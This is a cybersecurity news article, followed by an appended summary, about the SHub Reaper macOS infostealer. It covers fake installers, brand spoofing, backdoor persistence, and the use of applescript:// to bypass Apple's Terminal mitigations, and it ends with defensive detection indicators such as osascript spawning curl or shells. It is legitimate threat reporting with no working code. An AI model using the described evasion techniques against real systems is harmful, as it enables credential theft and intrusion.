Stealer Spoofs Google, Microsoft & Apple, Then Backdoors macOS TechTarget and Informa Tech’s Digital Business Combine.TechTarget and InformaTechTarget and Informa Tech’s Digital Business Combine.Together, we power an unparalleled network of 220+ online properties covering 10,000+ granular topics, serving an audience of 50+ million professionals with original, objective content from trusted sources. We help you gain critical insights and make more informed decisions across your business priorities.Dark Reading Resource LibraryBlack Hat NewsOmdia CybersecurityAdvertiseNewsletter Sign-UpNewsletter Sign-UpCybersecurity TopicsRelated TopicsApplication SecurityCybersecurity CareersCloud SecurityCyber RiskCyberattacks & Data BreachesCybersecurity AnalyticsCybersecurity OperationsData PrivacyEndpoint SecurityICS/OT SecurityIdentity & Access Mgmt SecurityInsider ThreatsIoTMobile SecurityPerimeterPhysical SecurityRemote WorkforceThreat IntelligenceVulnerabilities & ThreatsRecent in Cybersecurity TopicsVulnerabilities & ThreatsMicrosoft Exchange Zero-Day Under Attack, No Patch AvailableMicrosoft Exchange Zero-Day Under Attack, No Patch AvailablebyRob WrightMay 18, 20263 Min ReadApplication Security'Claw Chain' Vulnerabilities Threaten OpenClaw Deployments'Claw Chain' Vulnerabilities Threaten OpenClaw DeploymentsbyJai VijayanMay 18, 20265 Min ReadWorld Related TopicsDR GlobalMiddle East & AfricaAsia PacificLatin AmericaSee AllThe EdgeDR TechnologyEventsRelated TopicsUpcoming EventsPodcastsWebinarsSEE ALLResourcesRelated TopicsResource LibraryNewslettersPodcastsReportsVideosWebinarsWhite Papers Partner PerspectivesDark Reading Resource LibraryThreat IntelligenceEndpoint SecurityRemote WorkforceVulnerabilities & ThreatsNewsStealer Spoofs Google, Microsoft & Apple, Then Backdoors macOSThe SHub Reaper stealer, which hides behind fake WeChat and Miro installers, marks a shift from ClickFix social engineering to Apple script-based execution.Elizabeth Montalbano,Contributing WriterMay 19, 20264 Min ReadSource: Africa Studio via Alamy Stock PhotoA newly identified macOS infostealer combines capabilities of both stealer and backdoor malware while using a multistage social engineering campaign that impersonates Apple, Google, and Microsoft simultaneously. The stealer, SHub Reaper, is a variant of the broader Shub malware, and demonstrates a new paradigm in macOS malware behavior.SHub Reaper uses fake WeChat and Miro installers as social engineering lures to get users to download it, according to SentinelOne, which revealed details about the variant in a report Monday. Indeed, hiding behind fake application downloads is a popular way that attackers hide infostealing malware."The malware infection starts with malicious Web pages offering Miro and WeChat installers, and they aggressively look for browsers with extensions relating to crypto wallets and popular password managers," Phil Stokes, macOS and AI research engineer at SentinelOne, tells Dark Reading via email.Related:Tables Turn on 'The Gentlemen' RaaS Gang With Data LeakHowever, what makes SHub Reaper's impersonation unique is how the infection chain shifts its disguise at each stage of the attack, he says. The payload may be hosted on a typosquatted Microsoft domain, executed under the guise of an Apple security update, and persist from a fake Google Software Update directory, a "multibrand spoofing across a single chain" that "is unusual," Stokes tells Dark Reading.SHub Reaper: A Two-for-One MalwareSHub Reaper also flips traditional stealer behavior on its head by combining typical stealer features such as credential theft, wallet hijacking, and document exfiltration, with persistent backdoor access — aspects that usually are not found in stealer malware, Stokes noted. The malware does this by installing a fake Google Update framework under the user Library paths, and then registers a LaunchAgent using Google Keystone-style naming conventions. The beacon checks in every 60 seconds and supports arbitrary command execution, effectively turning an infostealer infection into a lightweight macOS backdoor, he observed."The backdoor adds yet another vector for theft and compromise," Stokes tells Dark Reading. "Earlier families of infostealers were notably smash-and-grab, and didn't even bother with persistence." SHub Reaper, on the other hand, "is a multifunctional malware that blends tradecraft from a number of recent families," he explains.A Paradigm-Changing Cyber Execution ChainThe malware also represents a behavior shift in how macOS stealers typically execute on a victim's machine, according to SentinelOne. Instead of relying on standard "ClickFix" social engineering, in which victims are tricked into pasting a command into Terminal, "the variant uses a delivery mechanism that bypasses Terminal entirely and sidesteps Apple's Tahoe 26.4 mitigation for those attack flows," Stokes wrote.Related:From Stuxnet to ChatGPT: 20 News Events That Shaped CyberHe's referring to Apple's recently introduced protections in its Tahoe 26.4 OS, aimed at reducing Terminal-driven social-engineering attacks such as ClickFix. However, SHub Reaper sidesteps those mitigations by moving execution into trusted Apple-native scripting workflows, using the applescript:// URL scheme to open macOS Script Editor with a malicious AppleScript already loaded.This shift away from standard social engineering tactics that require victims to manually paste commands into the Terminal marks "a noteworthy evolution in macOS infostealers," Jason Soroko, senior fellow at certificate life cycle management firm Sectigo, tells Dark Reading via email. "Attackers are instead exploiting the applescript:// URL scheme to automatically load the macOS Script Editor with malicious payloads, effectively circumventing" these new macOS mitigations, he says.The reason for this shift is that attackers can now "confine execution to running system processes or user-initiated processes like Script Editor or the Terminal," Stokes explained in the post. "This allows the attacker to execute without introducing foreign binaries to the file system, and makes it easier to bypass file scanning detection tools like Apple’s own XProtect and similar third-party tools."Related:Exploit Cyber-Frenzy Threatens Millions via Critical cPanel VulnerabilityNew Cyberattack Behaviors Call for New DefenseInfostealers are one of the quickest ways that attackers can compromise enterprise credentials, which can then be used to conduct further malicious activity. In fact, research from WhiteIntel revealed in March that it takes attackers only 48 hours to move stolen credentials from an infected laptop to an underground marketplace, which may be why their use by attackers is steadily rising, according to 2025 M-Trends report by Google's Mandiant.For macOS users, identifying the social engineering tactics SHub Reaper uses is the easiest way to prevent infection, according to SentinelOne. In particular, users should take note of the way the infection chain layers familiar brands and trusted software cues across multiple stages, Stokes noted in the report.For enterprise defenders, SHub Reaper's move from ClickFix to using Applescript and other living off the land (LotL) techniques for execution creates a new detection surface, rendering typical terminal-centric detections for these infections basically ineffective. Instead, SentinelOne recommends that security teams monitor for the following in their environments to detect SHub Reaper infections: unexpected invocation of Script Editor (Script Editor.app); osascript spawning curl or shell interpreters; browser-to-AppleScript execution chains; and user-driven AppleScript execution originating from unusual URL handlers.About the AuthorElizabeth MontalbanoContributing WriterElizabeth Montalbano is freelance writer, editor, and  journalist with 30 years of professional experience and a master's degree from Arizona State University. Her areas of expertise include enterprise technology, cybersecurity, business, and culture. During her long career, Elizabeth has lived and worked as a full-time journalist in Phoenix, San Francisco, and New York City. She specializes in news coverage and analysis, using her years of experience to look at the current state of cybersecurity with a critical gaze. She currently resides in a village on the southwest coast of Portugal, where in her free time she enjoys surfing, hiking with her dogs, growing plants, and playing and performing as a singer and musician.See more from Elizabeth MontalbanoWant more Dark Reading stories in your Google search results?Add Us NowMore InsightsIndustry ReportsHow Organizations Are Managing Incident ResponseHow Enterprises Are Developing Secure ApplicationsInside RSAC 2026: security leaders reveal the risks redefining your defense strategyHow Enterprises Are Harnessing Emerging Technologies in CybersecurityDitch the Data Center: Understanding Flexible Cloud Infrastructure Security ManagementAccess More ResearchWebinarsAI-Powered Cybersecurity for Resource-Constrained OrganizationsHow Security Teams should apply Threat Intelligence into their DefensesYour Guide to Securing AI Adoption in Your OrganizationWhat is the Right Role for Identity Threat Detection and Response (ITDR) in Your Organization?The New Attack Surface: How Attackers Are Exploiting OAuth to Own Your Cloud WorkspaceMore WebinarsEditor's ChoiceThreat IntelligenceFrom Stuxnet to ChatGPT: 20 News Events That Shaped CyberFrom Stuxnet to ChatGPT: 20 News Events That Shaped CyberbyDark Reading Editorial TeamMay 6, 202631 Min ReadCyber RiskPhysical Cargo Theft Gets a Boost From CybercriminalsPhysical Cargo Theft Gets a Boost From CybercriminalsbyRobert LemosMay 4, 20265 Min ReadWant more Dark Reading stories in your Google search results?Keep up with the latest cybersecurity threats, newly discovered vulnerabilities, data breach information, and emerging trends. Delivered daily or weekly right to your email inbox.SubscribeRSAC 2026: key news & insightsAt RSAC 2026, Dark Reading captured critical intelligence on AI, new attack methods, geopolitics, and much moreGet Your RecapWebinarsAI-Powered Cybersecurity for Resource-Constrained OrganizationsThurs, June 18, 2026, at 1pm ESTHow Security Teams should apply Threat Intelligence into their DefensesThurs, June 11, 2026 at 1pm ESTYour Guide to Securing AI Adoption in Your OrganizationTues, June 9, 2026 at 1pm ESTWhat is the Right Role for Identity Threat Detection and Response (ITDR) in Your Organization?Wed, June 3, 2026 at 1pm ESTThe New Attack Surface: How Attackers Are Exploiting OAuth to Own Your Cloud WorkspaceWed, June 24,2026 at 1pm ESTMore WebinarsBlack Hat USA | Mandalay Bay, Las VegasThe premier cybersecurity event of the year returns to Mandalay Bay with a re‑engineered, six‑day program built to ignite innovation, push boundaries, and bring the global security community together like never before. Use code: DARKREADING to save $200 on a Briefings pass or $100 on a Business pass.GET YOUR PASSDiscover MoreBlack HatOmdiaWorking With UsAbout UsAdvertiseReprintsJoin UsNewsletter Sign-UpFollow UsCopyright © 2026 TechTarget, Inc. d/b/a Informa TechTarget. This website is owned and operated by Informa TechTarget, part of a global network that informs, influences and connects the world’s technology buyers and sellers. All copyright resides with them. Informa PLC’s registered office is 5 Howick Place, London SW1P 1WG. Registered in England and Wales. TechTarget, Inc.’s registered office is 275 Grove St. Newton, MA 02466.Home|Cookie Policy|Privacy|Terms of UseYour Privacy Choices

A newly identified macOS infostealer, dubbed SHub Reaper, represents a significant evolution in malware behavior by combining traditional stealer functionality with persistent backdoor access and sophisticated social engineering. The infection process begins with attackers using malicious web pages hosting fake installers for applications like WeChat and Miro to lure victims, mirroring common social engineering tactics. This malware hides its activities by employing a multistage spoofing mechanism, impersonating major brands such as Apple, Google, and Microsoft across different stages of the attack chain. Phil Stokes, a macOS and AI research engineer at SentinelOne, noted that this process is unusual as it creates a "multibrand spoofing across a single chain."

SHub Reaper distinctly flips conventional stealer behavior by integrating features such as credential theft, wallet hijacking, and document exfiltration alongside persistent backdoor capabilities, which are typically absent in standard infostealers. To establish persistence, the malware installs a fake Google Update framework within the user Library paths and registers a LaunchAgent utilizing Google Keystone-style naming conventions. This backdoor maintains command and control by checking in every sixty seconds and enabling arbitrary command execution, thus transforming the infection from a simple infostealer into a lightweight macOS backdoor.

The malware demonstrates a paradigm shift in execution methods by moving away from conventional social engineering techniques, such as tricking users into entering commands into the Terminal (ClickFix), to exploiting native macOS scripting workflows. Jason Soroko, a senior fellow at Sectigo, explained that SHub Reaper bypasses Apple’s recent mitigations, such as Tahoe 26.4, by exploiting the applescript:// URL scheme. This mechanism allows attackers to automatically load the macOS Script Editor with malicious AppleScript loaded, effectively circumventing security measures designed to stop terminal-driven social engineering attacks. This shift enables attackers to confine execution to trusted system processes, like the Script Editor or Terminal, ensuring execution occurs without introducing foreign binaries to the file system, which aids in evading file scanning tools like Apple’s XProtect.

This evolution in attack execution creates a new detection surface for enterprise defenders, rendering traditional security controls focused on terminal activity largely ineffective. Consequently, SentinelOne recommends that security teams monitor environments for specific indicators related to SHub Reaper infections. These indicators include unexpected invocations of Script Editor.app, osascript spawning shell interpreters or curl commands, browser-to-AppleScript execution chains, and user-driven AppleScript execution originating from unusual URL handlers. Research indicates that infostealers are a rapid method for compromising enterprise credentials, as stolen data can be moved to marketplaces within forty-eight hours. Therefore, for macOS users, recognizing the layered use of familiar brand cues in the infection chain is crucial for prevention, and for organizations, monitoring for these specific Script Editor and scripting behaviors is essential for effective defense against this advanced malware.